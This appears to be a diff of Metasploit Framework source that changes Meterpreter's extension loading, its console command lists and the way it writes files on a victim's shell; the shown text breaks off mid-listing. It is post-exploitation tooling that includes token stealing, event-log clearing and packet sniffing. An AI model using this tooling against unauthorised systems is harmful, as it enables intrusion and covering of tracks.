$new = array_diff($commands, $tmp);
foreach ($new as $meth) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
}
return ERROR_SUCCESS;
}

19
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/CommandManager.java vendored
View File

@ -2,6 +2,7 @@ package com.metasploit.meterpreter;
import java.util.HashMap;
import java.util.Map;
import java.util.Vector;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.meterpreter.command.NotYetImplementedCommand;
@ -16,6 +17,7 @@ public class CommandManager {
private final int javaVersion;
private Map/* <String,Command> */registeredCommands = new HashMap();
private Vector/* <String> */newCommands = new Vector();
protected CommandManager() throws Exception {
// get the API version, which might be different from the
@ -97,6 +99,7 @@ public class CommandManager {
}
Command cmd = (Command) commandClass.newInstance();
registeredCommands.put(command, cmd);
newCommands.add(command);
}
/**
@ -108,4 +111,18 @@ public class CommandManager {
cmd = NotYetImplementedCommand.INSTANCE;
return cmd;
}
}
/**
* Reset the list of commands loaded by the last core_loadlib call
*/
public void resetNewCommands() {
newCommands.clear();
}
/**
* Retrieves the list of commands loaded by the last core_loadlib call
*/
public String[] getNewCommands() {
return (String[]) newCommands.toArray(new String[newCommands.size()]);
}
}

6
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java vendored
View File

@ -322,7 +322,7 @@ public class Meterpreter {
* @param data
* The extension jar's content as a byte array
*/
public void loadExtension(byte[] data) throws Exception {
public String[] loadExtension(byte[] data) throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
if (loadExtensions) {
URL url = MemoryBufferURLConnection.createURL(data, "application/jar");
@ -331,6 +331,8 @@ public class Meterpreter {
JarInputStream jis = new JarInputStream(new ByteArrayInputStream(data));
String loaderName = (String) jis.getManifest().getMainAttributes().getValue("Extension-Loader");
ExtensionLoader loader = (ExtensionLoader) classLoader.loadClass(loaderName).newInstance();
commandManager.resetNewCommands();
loader.load(commandManager);
return commandManager.getNewCommands();
}
}
}

8
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/core/core_loadlib.java vendored
View File

@ -9,7 +9,11 @@ public class core_loadlib implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
byte[] data = request.getRawValue(TLVType.TLV_TYPE_DATA);
meterpreter.loadExtension(data);
String[] commands = meterpreter.loadExtension(data);
for (int i = 0; i < commands.length; i++) {
response.addOverflow(TLVType.TLV_TYPE_METHOD, commands[i]);
}
return ERROR_SUCCESS;
}
}
}

18
external/source/meterpreter/source/common/base.c vendored
View File

@ -116,7 +116,7 @@ Command commands[] =
};
// Dynamically registered command extensions
Command *extensionList = NULL;
Command *extension_commands = NULL;
/*
* Dynamically register a custom command handler
@ -133,13 +133,13 @@ DWORD command_register(Command *command)
memcpy(newCommand, command, sizeof(Command));
dprintf("Setting new command...");
if (extensionList)
extensionList->prev = newCommand;
if (extension_commands)
extension_commands->prev = newCommand;
dprintf("Fixing next/prev...");
newCommand->next = extensionList;
newCommand->next = extension_commands;
newCommand->prev = NULL;
extensionList = newCommand;
extension_commands = newCommand;
dprintf("Done...");
return ERROR_SUCCESS;
@ -154,7 +154,7 @@ DWORD command_deregister(Command *command)
DWORD res = ERROR_NOT_FOUND;
// Search the extension list for the command
for (current = extensionList, prev = NULL;
for (current = extension_commands, prev = NULL;
current;
prev = current, current = current->next)
{
@ -164,7 +164,7 @@ DWORD command_deregister(Command *command)
if (prev)
prev->next = current->next;
else
extensionList = current->next;
extension_commands = current->next;
if (current->next)
current->next->prev = prev;
@ -288,7 +288,7 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
}
// Regardless of error code, try to see if someone has overriden a base handler
for( current = extensionList, result = ERROR_NOT_FOUND ;
for( current = extension_commands, result = ERROR_NOT_FOUND ;
result == ERROR_NOT_FOUND && current && current->method ; current = current->next )
{
if( strcmp( current->method, method ) )
@ -373,7 +373,7 @@ DWORD command_process_remote(Remote *remote, Packet *inPacket)
// Regardless of error code, try to see if someone has overriden
// a base handler
for (current = extensionList, res = ERROR_NOT_FOUND;
for (current = extension_commands, res = ERROR_NOT_FOUND;
res == ERROR_NOT_FOUND && current && current->method;
current = current->next)
{

6
external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c vendored
View File

@ -314,9 +314,9 @@ int get_interfaces_linux(Remote *remote, Packet *response) {
tlv_cnt++;
for (j = 0; j < ifaces->ifaces[i].addr_count; j++) {
if (allocd_entries < tlv_cnt+3) {
entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+3));
allocd_entries += 3;
if (allocd_entries < tlv_cnt+2) {
entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+2));
allocd_entries += 2;
}
if (ifaces->ifaces[i].addr_list[j].family == AF_INET) {
dprintf("ip addr for %s", ifaces->ifaces[i].name);

2
external/source/meterpreter/source/extensions/stdapi/server/stdapi.c vendored
View File

@ -296,6 +296,7 @@ Command customCommands[] =
{ request_sys_config_getprivs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
#ifdef _WIN32
{ "stdapi_sys_config_steal_token",
{ request_sys_config_steal_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
@ -304,6 +305,7 @@ Command customCommands[] =
{ request_sys_config_drop_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
#endif
// Net

10
external/source/meterpreter/source/server/posix/remote_dispatch.c vendored
View File

@ -1,6 +1,7 @@
#include <dlfcn.h>
#include "metsrv.h"
extern Command *extension_commands;
DWORD
request_core_loadlib(Remote *remote, Packet *packet)
@ -12,7 +13,9 @@ request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
PCHAR targetPath;
int local_error = 0;
Command *command;
Command *first = extension_commands;
do
{
Tlv dataTlv;
@ -64,6 +67,11 @@ request_core_loadlib(Remote *remote, Packet *packet)
dprintf("calling InitServerExtension");
res = init(remote);
}
if (response) {
for (command = extension_commands; command != first; command = command->next) {
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}
}
} while (0);

10
external/source/meterpreter/source/server/win/remote_dispatch.c vendored
View File

@ -5,6 +5,8 @@ extern HINSTANCE hAppInstance;
// see remote_dispatch_common.c
extern LIST * extension_list;
// see common/base.c
extern Command *extension_commands;
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
@ -15,6 +17,9 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
Command *first = extension_commands;
Command *command;
do
{
libraryPath = packet_get_tlv_value_string(packet,
@ -124,6 +129,11 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
free( extension );
}
dprintf("[SERVER] Called init()...");
if (response) {
for (command = extension_commands; command != first; command = command->next) {
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}
}
}

122
lib/msf/core/post/file.rb
View File

@ -212,7 +212,7 @@ protected
return nil
end
data = ''
data = fd.read
begin
until fd.eof?
data << fd.read
@ -247,77 +247,83 @@ protected
chunks = []
command = nil
encoding = :hex
line_max = _unix_max_line_length
# Leave plenty of room for the filename we're writing to and the
# command to echo it out
line_max -= file_name.length - 64
# Default to simple echo. If the data is binary, though, we have to do
# something fancy
if d =~ /[^[:print:]]/
# Ordered by descending likeliness to work
[
%q^perl -e 'print("\x41")'^,
# POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
# getting the GNU version.
%q^gawk 'BEGIN {ORS = ""; print "\x41"}' </dev/null^,
# bash and zsh's echo builtins are apparently the only ones
# that support both -e and -n as we need them. Most others
# treat all options as just more arguments to print. In
# particular, the standalone /bin/echo or /usr/bin/echo appear
# never to have -e so don't bother trying them.
%q^echo -ne '\x41'^,
# printf seems to have different behavior on bash vs sh vs
# other shells, try a full path (and hope it's the actual path)
%q^/usr/bin/printf '\x41'^,
%q^printf '\x41'^,
].each { |c|
a = session.shell_command_token("#{c}")
if "A" == a
command = c
break
#else
# p a
end
}
# Ordered by descending likeliness to work
[
# POSIX standard requires %b which expands octal (but not hex)
# escapes in the argument. However, some versions truncate input on
# nulls, so "printf %b '\0\101'" produces a 0-length string. The
# standalon version seems to be more likely to work than the buitin
# version, so try it first
{ :cmd => %q^/usr/bin/printf %b 'CONTENTS'^ , :enc => :octal },
{ :cmd => %q^printf %b 'CONTENTS'^ , :enc => :octal },
# Perl supports both octal and hex escapes, but octal is usually
# shorter (e.g. 0 becomes \0 instead of \x00)
{ :cmd => %q^perl -e 'print("CONTENTS")'^ , :enc => :octal },
# POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
# getting the GNU version.
{ :cmd => %q^gawk 'BEGIN {ORS = ""; print "CONTENTS"}' </dev/null^ , :enc => :hex },
# Use echo as a last resort since it frequently doesn't support -e
# or -n. bash and zsh's echo builtins are apparently the only ones
# that support both. Most others treat all options as just more
# arguments to print. In particular, the standalone /bin/echo or
# /usr/bin/echo appear never to have -e so don't bother trying
# them.
{ :cmd => %q^echo -ne 'CONTENTS'^ , :enc => :hex },
].each { |foo|
# Some versions of printf mangle %.
test_str = "\0\xff\xfeABCD\x7f%%\r\n"
if foo[:enc] == :hex
cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_hex(test_str) }
else
cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_octal(test_str) }
end
a = session.shell_command_token("#{cmd}")
if test_str == a
command = foo[:cmd]
encoding = foo[:enc]
break
else
p a
end
}
if command.nil?
raise RuntimeError, "Can't find command on the victim for writing binary data", caller
end
# each byte will balloon up to 4 when we hex encode
max = line_max/4
i = 0
while (i < d.length)
chunks << Rex::Text.to_hex(d.slice(i...(i+max)))
i += max
end
else
i = 0
while (i < d.length)
chunk = d.slice(i...(i+line_max))
# POSIX standard says single quotes cannot appear inside single
# quotes and can't be escaped. Replace them with an equivalent.
# (Close single quotes, open double quotes containing a single
# quote, re-open single qutoes)
chunk.gsub!("'", %q|'"'"'|)
chunks << chunk
i += line_max
end
command = "echo -n '\\x41'"
if command.nil?
raise RuntimeError, "Can't find command on the victim for writing binary data", caller
end
vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks, using #{command.split(" ",2).first}")
# each byte will balloon up to 4 when we encode
# (A becomes \x41 or \101)
max = line_max/4
i = 0
while (i < d.length)
if encoding == :hex
chunks << Rex::Text.to_hex(d.slice(i...(i+max)))
else
chunks << Rex::Text.to_octal(d.slice(i...(i+max)))
end
i += max
end
vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes (#{encoding}-encoded), using #{command.split(" ",2).first}")
# The first command needs to use the provided redirection for either
# appending or truncating.
cmd = command.sub("\\x41", chunks.shift)
cmd = command.sub("CONTENTS") { chunks.shift }
session.shell_command_token("#{cmd} #{redirect} '#{file_name}'")
# After creating/truncating or appending with the first command, we
# need to append from here on out.
chunks.each { |chunk|
cmd = command.sub("\\x41", chunk)
vprint_status("Next chunk is #{chunk.length} bytes")
cmd = command.sub("CONTENTS") { chunk }
session.shell_command_token("#{cmd} >> '#{file_name}'")
}
@ -336,7 +342,11 @@ protected
i=`expr $i + 1`; str=$str$str;\
done; echo $max'
line_max = session.shell_command_token(calc_line_max).to_i
# Fall back to a conservative 4k which should work on even the most
# restrictive of embedded shells.
line_max = (line_max == 0 ? 4096 : line_max)
vprint_status("Max line length is #{line_max}")
line_max
end

205
lib/msf/core/post/linux/system.rb
View File

@ -6,145 +6,92 @@ class Post
module Linux
module System
include ::Msf::Post::Common
include ::Msf::Post::File
include ::Msf::Post::File
# Returns a Hash containing Distribution Name, Version and Kernel Information
def get_sysinfo
system_data = {}
etc_files = cmd_exec("ls /etc").split()
include ::Msf::Post::Unix
# Debian
if etc_files.include?("debian_version")
kernel_version = cmd_exec("uname -a")
if kernel_version =~ /Ubuntu/
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "ubuntu"
system_data[:version] = version
system_data[:kernel] = kernel_version
else
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "debian"
system_data[:version] = version
system_data[:kernel] = kernel_version
end
# Returns a Hash containing Distribution Name, Version and Kernel Information
def get_sysinfo
system_data = {}
etc_files = cmd_exec("ls /etc").split()
# Amazon
elsif etc_files.include?("system-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "amazon"
system_data[:version] = version
system_data[:kernel] = kernel_version
kernel_version = cmd_exec("uname -a")
system_data[:kernel] = kernel_version
# Fedora
elsif etc_files.include?("fedora-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "fedora"
system_data[:version] = version
system_data[:kernel] = kernel_version
# Oracle Linux
elsif etc_files.include?("enterprise-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "oracle"
system_data[:version] = version
system_data[:kernel] = kernel_version
# RedHat
elsif etc_files.include?("redhat-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "redhat"
system_data[:version] = version
system_data[:kernel] = kernel_version
# Arch
elsif etc_files.include?("arch-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "arch"
system_data[:version] = version
system_data[:kernel] = kernel_version
# Slackware
elsif etc_files.include?("slackware-version")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "slackware"
system_data[:version] = version
system_data[:kernel] = kernel_version
# Mandrake
elsif etc_files.include?("mandrake-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "mandrake"
system_data[:version] = version
system_data[:kernel] = kernel_version
#SuSE
elsif etc_files.include?("SuSE-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "suse"
system_data[:version] = version
system_data[:kernel] = kernel_version
# Gentoo
elsif etc_files.include?("gentoo-release")
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "gentoo"
system_data[:version] = version
system_data[:kernel] = kernel_version
else
# Others
kernel_version = cmd_exec("uname -a")
# Debian
if etc_files.include?("debian_version")
if kernel_version =~ /Ubuntu/
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "linux"
system_data[:distro] = "ubuntu"
system_data[:version] = version
else
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "debian"
system_data[:version] = version
system_data[:kernel] = kernel_version
end
return system_data
end
# Returns an array of hashes each representing a user
# Keys are name, uid, gid, info, dir and shell
def get_users
users = []
cmd_out = cmd_exec("cat /etc/passwd").split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:uid] = user_field[2]
entry[:gid] = user_field[3]
entry[:info] = user_field[4]
entry[:dir] = user_field[5]
entry[:shell] = user_field[6]
users << entry
end
return users
end
# Amazon
elsif etc_files.include?("system-release")
version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "amazon"
system_data[:version] = version
# Returns an array of hashes each hash representing a user group
# Keys are name, gid and users
def get_groups
groups = []
cmd_out = cmd_exec("cat /etc/group").split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:gid] = user_field[2]
entry[:users] = user_field[3]
groups << entry
end
return groups
# Fedora
elsif etc_files.include?("fedora-release")
version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "fedora"
system_data[:version] = version
# Oracle Linux
elsif etc_files.include?("enterprise-release")
version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "oracle"
system_data[:version] = version
# RedHat
elsif etc_files.include?("redhat-release")
version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "redhat"
system_data[:version] = version
# Arch
elsif etc_files.include?("arch-release")
version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "arch"
system_data[:version] = version
# Slackware
elsif etc_files.include?("slackware-version")
version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "slackware"
system_data[:version] = version
# Mandrake
elsif etc_files.include?("mandrake-release")
version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "mandrake"
system_data[:version] = version
#SuSE
elsif etc_files.include?("SuSE-release")
version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "suse"
system_data[:version] = version
# Gentoo
elsif etc_files.include?("gentoo-release")
version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "gentoo"
system_data[:version] = version
else
# Others
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
system_data[:distro] = "linux"
system_data[:version] = version
end
return system_data
end
end # System

62
lib/msf/core/post/solaris/system.rb
View File

@ -1,59 +1,29 @@
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/unix'
module Msf
class Post
module Solaris
module System
include ::Msf::Post::Common
include ::Msf::Post::File
include ::Msf::Post::File
# Returns a Hash containing Distribution Name, Version and Kernel Information
def get_sysinfo
system_data = {}
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/release").split("\n")[0].strip
system_data[:version] = version
system_data[:kernel] = kernel_version
system_data[:hostname] = kernel_version.split(" ")[1]
return system_data
end
# Returns an array of hashes each representing a user
# Keys are name, uid, gid, info, dir and shell
def get_users
users = []
cmd_out = cmd_exec("cat /etc/passwd").split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:uid] = user_field[2]
entry[:gid] = user_field[3]
entry[:info] = user_field[4]
entry[:dir] = user_field[5]
entry[:shell] = user_field[6]
users << entry
end
return users
end
# Returns an array of hashes each hash representing a user group
# Keys are name, gid and users
def get_groups
groups = []
cmd_out = cmd_exec("cat /etc/group").split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
entry[:name] = user_field[0]
entry[:gid] = user_field[2]
entry[:users] = user_field[3]
groups << entry
end
return groups
end
include ::Msf::Post::Unix
#
# Returns a Hash containing Distribution Name, Version and Kernel
# Information
#
def get_sysinfo
system_data = {}
kernel_version = cmd_exec("uname -a")
version = read_file("/etc/release").split("\n")[0].strip
system_data[:version] = version
system_data[:kernel] = kernel_version
system_data[:hostname] = kernel_version.split(" ")[1]
return system_data
end
end # System
end # Solaris

23
lib/rex/post/meterpreter/client.rb
View File

@ -104,6 +104,7 @@ class Client
self.alive = true
self.target_id = opts[:target_id]
self.capabilities = opts[:capabilities] || {}
self.commands = []
self.conn_id = opts[:conn_id]
@ -281,6 +282,7 @@ class Client
# if a matching extension alias exists for the supplied symbol.
#
def method_missing(symbol, *args)
#$stdout.puts("method_missing: #{symbol}")
self.ext_aliases.aliases[symbol.to_s]
end
@ -294,7 +296,9 @@ class Client
# Loads the client half of the supplied extension and initializes it as a
# registered extension that can be reached through client.ext.[extension].
#
def add_extension(name)
def add_extension(name, commands=[])
self.commands |= commands
# Check to see if this extension has already been loaded.
if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
old = Rex::Post::Meterpreter::Extensions.constants
@ -341,6 +345,18 @@ class Client
#
def register_extension_alias(name, ext)
self.ext_aliases.aliases[name] = ext
# Whee! Syntactic sugar, where art thou?
#
# Create an instance method on this object called +name+ that returns
# +ext+. We have to do it this way instead of simply
# self.class.class_eval so that other meterpreter sessions don't get
# extension methods when this one does
(class << self; self; end).class_eval do
define_method(name.to_sym) do
ext
end
end
ext
end
#
@ -445,10 +461,15 @@ class Client
# Flag indicating whether to hex-encode UTF-8 file names and other strings
#
attr_accessor :encode_unicode
#
# A list of the commands
#
attr_reader :commands
protected
attr_accessor :parser, :ext_aliases # :nodoc:
attr_writer :ext, :sock # :nodoc:
attr_writer :commands # :nodoc:
end
end; end; end

14
lib/rex/post/meterpreter/client_core.rb
View File

@ -121,7 +121,12 @@ class ClientCore < Extension
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
end
return true
commands = []
response.each(TLV_TYPE_METHOD) { |c|
commands << c.value
}
return commands
end
#
@ -150,13 +155,12 @@ class ClientCore < Extension
path = ::File.expand_path(path)
# Load the extension DLL
if (load_library(
commands = load_library(
'LibraryFilePath' => path,
'UploadLibrary' => true,
'Extension' => true,
'SaveToDisk' => opts['LoadFromDisk']))
client.add_extension(mod)
end
'SaveToDisk' => opts['LoadFromDisk'])
client.add_extension(mod, commands)
return true
end

20
lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
View File

@ -22,7 +22,7 @@ class Sniffer < Extension
client.register_extension_aliases(
[
{
{
'name' => 'sniffer',
'ext' => self
},
@ -42,19 +42,19 @@ class Sniffer < Extension
ikeys = %W{idx name description type mtu wireless usable dhcp}
ikeys.each_index { |i| iface[ikeys[i]] = vals[i] }
ifaces << iface
}
}
return ifaces
end
# Start a packet capture on an opened interface
def capture_start(intf,maxp=200000,filter="")
request = Packet.create_request('sniffer_capture_start')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
response = client.send_request(request)
response = client.send_request(request)
end
# Stop an active packet capture
def capture_stop(intf)
request = Packet.create_request('sniffer_capture_stop')
@ -65,7 +65,7 @@ class Sniffer < Extension
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
# Retrieve stats about a current capture
def capture_stats(intf)
request = Packet.create_request('sniffer_capture_stats')
@ -87,7 +87,7 @@ class Sniffer < Extension
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
# Buffer the current capture to a readable buffer
def capture_dump(intf)
request = Packet.create_request('sniffer_capture_dump')
@ -99,19 +99,19 @@ class Sniffer < Extension
:linktype => response.get_tlv_value(TLV_TYPE_SNIFFER_INTERFACE_ID),
}
end
# Retrieve the packet data for the specified capture
def capture_dump_read(intf, len=16384)
request = Packet.create_request('sniffer_capture_dump_read')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
response = client.send_request(request, 3600)
{
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
:data => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET)
}
end
end
end; end; end; end; end

10
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -43,11 +43,9 @@ class Console::CommandDispatcher::Core
"close" => "Closes a channel",
"channel" => "Displays information about active channels",
"exit" => "Terminate the meterpreter session",
"detach" => "Detach the meterpreter session (for http/https)",
"help" => "Help menu",
"interact" => "Interacts with a channel",
"irb" => "Drop into irb scripting mode",
"migrate" => "Migrate the server to another process",
"use" => "Deprecated alias for 'load'",
"load" => "Load one or more meterpreter extensions",
"quit" => "Terminate the meterpreter session",
@ -61,6 +59,14 @@ class Console::CommandDispatcher::Core
"enable_unicode_encoding" => "Enables encoding of unicode strings",
"disable_unicode_encoding" => "Disables encoding of unicode strings"
}
if client.passive_service
c["detach"] = "Detach the meterpreter session (for http/https)"
end
if client.commands.include? "core_migrate"
c["migrate"] = "Migrate the server to another process"
end
if (msf_loaded?)
c["info"] = "Displays information about a Post module"
end

74
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
View File

@ -34,24 +34,56 @@ class Console::CommandDispatcher::Stdapi::Fs
# List of supported commands.
#
def commands
{
all = {
"cat" => "Read the contents of a file to the screen",
"cd" => "Change directory",
"del" => "Delete the specified file",
"download" => "Download a file or directory",
"edit" => "Edit a file",
"getlwd" => "Print local working directory",
"getwd" => "Print working directory",
"lcd" => "Change local working directory",
"lpwd" => "Print local working directory",
"ls" => "List files",
"mkdir" => "Make directory",
"pwd" => "Print working directory",
"rmdir" => "Remove directory",
"upload" => "Upload a file or directory",
"lcd" => "Change local working directory",
"getlwd" => "Print local working directory",
"lpwd" => "Print local working directory",
"rm" => "Delete the specified file",
"del" => "Delete the specified file",
"search" => "Search for files"
"rmdir" => "Remove directory",
"search" => "Search for files",
"upload" => "Upload a file or directory",
}
reqs = {
"cat" => [ ],
"cd" => [ "stdapi_fs_chdir" ],
"del" => [ "stdapi_fs_rm" ],
"download" => [ ],
"edit" => [ ],
"getlwd" => [ ],
"getwd" => [ "stdapi_fs_getwd" ],
"lcd" => [ ],
"lpwd" => [ ],
"ls" => [ "stdapi_fs_stat", "stdapi_fs_ls" ],
"mkdir" => [ "stdapi_fs_mkdir" ],
"pwd" => [ "stdapi_fs_getwd" ],
"rmdir" => [ "stdapi_fs_delete_dir" ],
"rm" => [ "stdapi_fs_rm" ],
"search" => [ "stdapi_fs_search" ],
"upload" => [ ],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#
@ -65,18 +97,18 @@ class Console::CommandDispatcher::Stdapi::Fs
# Search for files.
#
def cmd_search( *args )
root = nil
glob = nil
recurse = true
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-d" => [ true, "The directory/drive to begin searching from. Leave empty to search all drives. (Default: #{root})" ],
"-f" => [ true, "The file pattern glob to search for. (e.g. *secret*.doc?)" ],
"-r" => [ true, "Recursivly search sub directories. (Default: #{recurse})" ]
)
opts.parse(args) { | opt, idx, val |
case opt
when "-h"
@ -92,14 +124,14 @@ class Console::CommandDispatcher::Stdapi::Fs
recurse = false if( val =~ /^(f|n|0)/i )
end
}
if( not glob )
print_error( "You must specify a valid file glob to search for, e.g. >search -f *.doc" )
return
end
files = client.fs.file.search( root, glob, recurse )
if( not files.empty? )
print_line( "Found #{files.length} result#{ files.length > 1 ? 's' : '' }..." )
files.each do | file |
@ -112,9 +144,9 @@ class Console::CommandDispatcher::Stdapi::Fs
else
print_line( "No files matching your search were found." )
end
end
#
# Reads the contents of a file and prints them to the screen.
#
@ -169,7 +201,7 @@ class Console::CommandDispatcher::Stdapi::Fs
return true
end
#
# Delete the specified file.
#
@ -183,7 +215,7 @@ class Console::CommandDispatcher::Stdapi::Fs
return true
end
alias :cmd_del :cmd_rm
def cmd_download_help
@ -192,7 +224,7 @@ class Console::CommandDispatcher::Stdapi::Fs
print_line "Downloads remote files and directories to the local machine."
print_line @@download_opts.usage
end
#
# Downloads a file or directory from the remote machine to the local
# machine.
@ -250,7 +282,7 @@ class Console::CommandDispatcher::Stdapi::Fs
}
end
}
return true
end
@ -454,7 +486,7 @@ class Console::CommandDispatcher::Stdapi::Fs
}
end
}
return true
end

29
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
View File

@ -54,12 +54,39 @@ class Console::CommandDispatcher::Stdapi::Net
# List of supported commands.
#
def commands
{
all = {
"ipconfig" => "Display interfaces",
"ifconfig" => "Display interfaces",
"route" => "View and modify the routing table",
"portfwd" => "Forward a local port to a remote service",
}
reqs = {
"ipconfig" => [ "stdapi_net_config_get_interfaces" ],
"ifconfig" => [ "stdapi_net_config_get_interfaces" ],
"route" => [
# Also uses these, but we don't want to be unable to list them
# just because we can't alter them.
#"stdapi_net_config_add_route",
#"stdapi_net_config_remove_route",
"stdapi_net_config_get_routes"
],
# Only creates tcp channels, which is something whose availability
# we can't check directly at the moment.
"portfwd" => [ ],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#

74
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
View File

@ -48,23 +48,67 @@ class Console::CommandDispatcher::Stdapi::Sys
# List of supported commands.
#
def commands
{
"clearev" => "Clear the event log",
"execute" => "Execute a command",
"getpid" => "Get the current process identifier",
"getuid" => "Get the user that the server is running as",
"getprivs" => "Attempt to enable all privileges available to the current process",
"kill" => "Terminate a process",
"ps" => "List running processes",
"reboot" => "Reboots the remote computer",
"reg" => "Modify and interact with the remote registry",
"rev2self" => "Calls RevertToSelf() on the remote machine",
"sysinfo" => "Gets information about the remote system, such as OS",
"shell" => "Drop into a system command shell",
"shutdown" => "Shuts down the remote computer",
"steal_token" => "Attempts to steal an impersonation token from the target process",
all = {
"clearev" => "Clear the event log",
"drop_token" => "Relinquishes any active impersonation token.",
"execute" => "Execute a command",
"getpid" => "Get the current process identifier",
"getprivs" => "Attempt to enable all privileges available to the current process",
"getuid" => "Get the user that the server is running as",
"kill" => "Terminate a process",
"ps" => "List running processes",
"reboot" => "Reboots the remote computer",
"reg" => "Modify and interact with the remote registry",
"rev2self" => "Calls RevertToSelf() on the remote machine",
"shell" => "Drop into a system command shell",
"shutdown" => "Shuts down the remote computer",
"steal_token" => "Attempts to steal an impersonation token from the target process",
"sysinfo" => "Gets information about the remote system, such as OS",
}
reqs = {
"clearev" => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
"drop_token" => [ "stdapi_sys_config_drop_token" ],
"execute" => [ "stdapi_sys_process_execute" ],
"getpid" => [ "stdapi_sys_process_getpid" ],
